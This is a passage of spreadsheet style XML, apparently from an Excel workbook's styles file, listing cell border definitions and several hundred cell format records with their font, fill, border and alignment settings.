      <left style="medium">
        <color rgb="FF000000"/>
      </left>
      <right style="medium">
        <color rgb="FF000000"/>
      </right>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF000000"/>
      </left>
      <right style="medium">
        <color rgb="FF000000"/>
      </right>
      <bottom style="medium">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF000000"/>
      </left>
      <top style="thin">
        <color rgb="FF000000"/>
      </top>
    </border>
    <border>
      <right style="medium">
        <color rgb="FF000000"/>
      </right>
      <top style="thin">
        <color rgb="FF000000"/>
      </top>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>
      <bottom style="medium">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF000000"/>
      </left>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <right style="medium">
        <color rgb="FF000000"/>
      </right>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <left style="thick">
        <color rgb="FF000000"/>
      </left>
      <right style="thin">
        <color rgb="FF000000"/>
      </right>
      <top style="thick">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thick">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <right style="thin">
        <color rgb="FF000000"/>
      </right>
      <top style="thick">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thick">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>
      <right style="thin">
        <color rgb="FF000000"/>
      </right>
      <top style="thick">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thick">
        <color rgb="FF000000"/>
      </bottom>
    </border>
  </borders>
  <cellStyleXfs count="1">
    <xf borderId="0" fillId="0" fontId="0" numFmtId="0" applyAlignment="1" applyFont="1"/>
  </cellStyleXfs>
  <cellXfs count="914">
    <xf borderId="0" fillId="0" fontId="0" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="2" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="3" fillId="0" fontId="2" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="4" fillId="0" fontId="2" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="5" fillId="0" fontId="2" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="6" fillId="0" fontId="2" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="7" fillId="0" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="8" fillId="0" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="9" fillId="0" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="3" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="1" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="4" numFmtId="164" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="2" fillId="2" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="3" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="2" fillId="4" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="3" fillId="5" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="10" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="164" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="4" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="11" fillId="5" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="11" fillId="5" fontId="3" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="4" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="5" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="5" fillId="0" fontId="4" numFmtId="164" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="5" fillId="2" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="5" fillId="3" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="5" fillId="4" fontId="3" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="6" fillId="5" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="7" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="8" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="0" fontId="4" numFmtId="49" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="6" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="10" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="11" fillId="0" fontId="2" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="4" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="5" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="10" fillId="0" fontId="2" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="12" fillId="2" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="13" fillId="0" fontId="2" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="14" fillId="0" fontId="2" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="15" fillId="2" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="12" fillId="3" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="16" fillId="3" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="12" fillId="4" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="16" fillId="4" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="4" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="12" fillId="5" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="12" fillId="6" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="10" xfId="0" applyFont="1" applyNumberFormat="1"/>
    <xf borderId="17" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="18" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="18" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="19" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="19" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="20" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="18" fillId="7" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="20" fillId="7" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="18" fillId="7" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="18" fillId="7" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="19" fillId="7" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="19" fillId="7" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="20" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="21" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="6" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="5" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="19" fillId="7" fontId="9" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="22" fillId="7" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="23" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="16" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="16" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="17" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="2" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="9" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="2" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="2" fontId="14" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="3" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="3" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="3" fontId="14" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="3" fontId="14" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="14" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="5" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="5" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="5" fontId="14" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="24" fillId="5" fontId="14" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="10" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="11" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="12" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="14" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="11" fontId="17" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="12" fontId="17" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="16" numFmtId="49" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="16" numFmtId="49" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="16" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="25" fillId="10" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="16" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="3" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="3" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="11" fontId="19" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="12" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="8" fillId="8" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="8" fillId="3" fontId="20" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="20" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="5" fontId="20" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
